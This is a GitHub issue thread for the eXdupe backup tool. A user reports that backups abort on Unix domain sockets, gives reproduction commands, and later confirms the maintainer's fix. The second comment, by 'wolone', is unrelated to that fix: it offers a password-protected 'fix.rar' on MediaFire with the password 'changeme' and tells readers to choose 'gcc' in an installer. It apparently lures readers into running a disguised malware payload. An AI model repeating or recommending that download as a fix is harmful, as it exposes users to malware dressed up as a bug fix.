### ISSUE TITLE
eXdupe trips over Unix domain sockets

### ISSUE THREAD

**Issue by koerch** [rrrlasse/eXdupe#8]
Hi there,

eXdupe fails to backup a directory containing a Unix domain socket on Linux:

- Make a test directory and fill it with some stuff

`$ mkdir exdupetest`
`$ cp -r /usr/share/doc/lib* exdupetest/`

- Add a domain socket to the directory

`$ python3 -c "import socket as s; sock = s.socket(s.AF_UNIX); sock.bind('/home/kork/exdupetest/test.sock')"`
`$ ls -la exdupetest/test.sock`
`srwxrwxr-x 1 kork kork 0 Aug 26 18:21 exdupetest/test.sock`
`$ file exdupetest/test.sock`
`exdupetest/test.sock: socket`

- Run exdupe, expected outcome:

`$ exdupe exdupetest exdupetest.full`
`Compressed 33,969,462 B in 3,748 files into 11.8 MB`

- What actually happens:

`$ exdupe exdupetest exdupetest.full`
`Aborted, error opening source file: /home/kork/exdupetest/test.sock`

The problem can be mitigated with the -c switch, but it would be prettier if exdupe didn't trip over those sockets and would just ignore or otherwise gracefully handle them. 1.0.0 shows the exact same behavior.

Build ID:
`$ exdupe -B`
`ver 1.1.0.dev36, built 2024-08-26 16:12:00 %, sha 91fde4e, release mode`

I'll gladly test fixes!

Best,
Marco

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rrrlasse** [comment]
Thanks, will be fixed very soon :)

**Comment by rrrlasse** [comment]
@koerch you can test the lastest commit which should fix it. You can build it with the instrucitons on https://github.com/rrrlasse/eXdupe

**Comment by koerch** [comment]
@rrrlasse Looking good!

`kork@dinokuh ~ $ ./exdupe /home/kork/exdupetest /home/kork/exdupetest.full`
`Compressed 5,776,815 B in 780 files into 3.75 MB`

I also verified a full restore - everything's in there except for the socket. Thank you! 😀

Best,
Marco
